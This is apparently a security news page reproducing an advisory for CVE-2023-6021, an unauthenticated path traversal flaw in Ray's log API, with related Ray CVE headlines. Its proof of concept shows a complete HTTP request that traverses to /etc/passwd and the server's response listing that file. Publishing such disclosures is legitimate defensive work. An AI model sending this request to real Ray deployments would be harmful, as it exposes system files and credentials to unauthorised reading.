Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-6021: LFI in Ray API in ray

LFI in Ray’s log API endpoint allows attackers to read any file on the server without authentication.

CVE
#mac#js#intel#auth#firefox

Description

Attackers can read any file on the system with the permissions of the user that started the Ray Dashboard.

Proof of Concept

GET /api/v0/logs/file?node_id=56424ecdb00cf570f0831aa698dd7c44e527a20212d2fa27078c7f79&filename=../../../../../etc%2fpasswd&lines=50000 HTTP/1.1
Host: localhost:8265
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8265/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Thu, 24 Aug 2023 21:49:54 GMT
Server: Python/3.8 aiohttp/3.8.5
Connection: close
Content-Length: 8225

1##
# User Database
# 
# Note that this file is consulted directly only when the system is running
# in single-user mode.  At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
fakeuser:*:99:99:Fake User:/Users/danmcinerney/fakeuser:/bin/sh
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico

Impact

Allows attackers to remotely read any file on the system depending on the permissions of the user that started Ray.

Occurrences

Related news

Critical Vulns Found in Ray Open Source Framework for AI/ML Workloads

Anyscale has dismissed the vulnerabilities as non-issues, according to researchers who reported the bugs to the company.

CVE-2023-48023: Ray, Versions 2.6.3, 2.8.0

Anyscale Ray 2.6.3 and 2.8.0 allows /log_proxy SSRF. NOTE: the vendor's position is that this report is irrelevant because Ray, as stated in its documentation, is not intended for use outside of a strictly controlled network environment

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907